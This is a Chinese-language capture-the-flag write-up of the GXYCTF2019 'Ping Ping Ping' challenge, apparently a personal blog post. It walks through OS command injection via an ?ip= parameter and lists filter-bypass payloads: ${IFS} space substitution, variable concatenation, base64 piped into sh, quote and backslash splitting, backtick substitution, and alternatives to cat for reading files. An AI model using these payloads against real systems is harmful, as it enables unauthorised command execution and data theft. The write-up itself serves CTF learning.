[GXYCTF2019]Ping Ping Ping

image-20210618071332645

打开是这个样子

提示我们用?ip=

尝试一下ping吧

?ip=127.0.0.1

image-20210618071432140

命令执行成功

接下来试试执行命令吧

?ip=127.0.0.1 || ls

image-20210618071535681

发现空格被过滤

那我们把空格去掉

?ip=127.0.0.1||ls

image-20210618071640656

想得到flag肯定要执行以下命令

?ip=127.0.0.1||cat flag.php

但是空格仍然存在

想办法替换空格

空格过滤

  1. ${IFS}替换
  2. $IFS$1替换
  3. ${IFS替换
  4. %20替换
  5. <和<>重定向符替换
  6. %09替换

我们一个个来试一下

?ip=127.0.0.1||cat$IFSflag.php

image-20210618071913612

发现可以,但是flag被过滤了。。

这样说明flag被过滤了 去看一下Index.php

?ip=127.0.0.1||cat$IFS$1index.php

image-20210618072107328

发现源码出来了。可以看到flag.<>.{}都被过滤了。bash也被过滤。这时候我们可以想着试一下变量拼接.

?ip=1;a=g;cat$IFS$1fla$a.php;

image-20210618072322153

打开源码即可看到flag
不过在网上看大佬们的wp发现还有其他更牛逼的解法。列一下以备以后学习。

1.base64编码

如题目一样就是用base64进行编码,再用命令进行解读。从而达到执行。
这里用的是sh,sh的大部分脚本都可以在bash下运行
附上大佬的payload

echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

1

前边Y2F0IGZsYWcucGhw是cat flag.php的base64编码.在用base64 -d命令进行执行
这里边的|是管道符。去查了一下总结一下
常见管道符

Windows系统支持的管道符

1.管道符|
|直接执行后面的语句
2.管道符||
||如果前面命令是错的那么就执行后面的语句,否则只执行前面的语在
3.管道符&
&前面和后面命令都要执行,无论前面真假
这里附上大佬的网站https://www.ghtwf01.cn/index.php/archives/273/

言归正传。接下来说另外的几种方法

2.单引号、双引号绕过

ca"t fl''ag

可以使用这种方法去绕过有时候的cat 和flag 但在本题单双引号被ban了

3.反斜线绕过

ca\t fl\ag

本题中反斜线也被ban了
4.$1、$2等和 $@绕过

c$1at gh$@twf01.txt

如果cat被过滤,可以用下边的方法进行绕过~~

(1)more:一页一页的显示档案内容

(2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页

(3)head:查看头几行

(4)tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示

(5)tail:查看尾几行

(6)nl:显示的时候,顺便输出行号

(7)od:以二进制的方式读取档案内容

(8)vi:一种编辑器,这个也可以查看

(9)vim:一种编辑器,这个也可以查看

(10)sort:可以查看

(11)uniq:可以查看

(12)file -f:报错出具体内容

最后说一个最强的payload
内敛绕过

内联,就是将反引号内命令的输出作为输入执行。

?ip=127.0.0.1;cat$IFS$1`ls`

这样直接全部代码都出来了,这大佬也太强了吧,直接秒题
学到了学到了

总结

1.学会了对空格的替换
2.学会了利用sh命令利用base64编码执行想要的命令
3.内敛绕过,真是tql

最后修改:2021 年 06 月 18 日 07 : 28 AM
如果觉得我的文章对你有用,请随意赞赏